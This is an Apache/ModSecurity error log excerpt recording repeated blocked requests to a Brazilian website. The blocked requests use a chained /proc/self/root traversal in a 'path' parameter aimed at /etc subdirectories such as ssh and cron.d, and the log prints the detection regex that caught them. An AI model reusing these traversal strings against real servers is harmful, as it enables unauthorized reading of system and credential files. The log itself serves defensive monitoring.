[tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn3V1pVZ5mVmJwsFP-XQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:28.133050 2026] [proxy_fcgi:error] [pid 21219:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50824] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:23:30.367856 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:33806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn4ta6ubjKNq_cu4abDAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:32.834561 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:33806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn49a6ubjKNq_cu4abDgAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:34.889517 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:33812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn5l1pVZ5mVmJwsFP-awAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:37.202966 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:33822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn6TJ3M9BSuKP7CAbcFgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:41.067332 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:34400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn7bninkcc-iUj5AoqugAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:46.419164 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:34410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn8hCii7xarUs8iHYw7AAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:51.911346 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:33596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn9_HIg5MgXLBnicPJKwAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:56.125892 2026] [proxy_fcgi:error] [pid 9818:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51882] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:23:59.642276 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:33604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn_eoXxyEfFpUF8f9Q4QAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:24:01.299726 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:44826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoAfu8EFLIOrSqIpvrwwAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:24:20.730989 2026] [:error] [pid 8732:tid 140411658000128] [client 74.7.243.128:44828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoFGWiXEnWizZLXKRTsQAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:24:26.141783 2026] [proxy_fcgi:error] [pid 8307:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52926] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:24:28.309525 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:60144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoHPqxLDW4GITHUkSvLwAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:24:37.250866 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:36928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoJTJ3M9BSuKP7CAbcOwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:24:46.658862 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:49520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoLjJ3M9BSuKP7CAbcQAAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:24:55.129795 2026] [proxy_fcgi:error] [pid 11642:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54140] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:24:55.336873 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.243.128:34542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoN11pVZ5mVmJwsFP-mwAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:25:04.792258 2026] [:error] [pid 30424:tid 140411725141760] [client 74.7.243.128:42656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoQMt36Dv4L1GW-s-khgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:25:07.991107 2026] [:error] [pid 30424:tid 140411674785536] [client 74.7.243.128:42656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoQ8t36Dv4L1GW-s-kiQAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:25:19.807279 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:41494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoTrninkcc-iUj5Aoq6gAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:25:27.136033 2026] [proxy_fcgi:error] [pid 12903:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55512] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:25:39.939762 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:38224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoY_qxLDW4GITHUkSvSwAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:25:52.516754 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:44874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzocPqxLDW4GITHUkSvUgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:25:55.140494 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56820] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:26:04.626538 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:51816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzofPqxLDW4GITHUkSvVgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
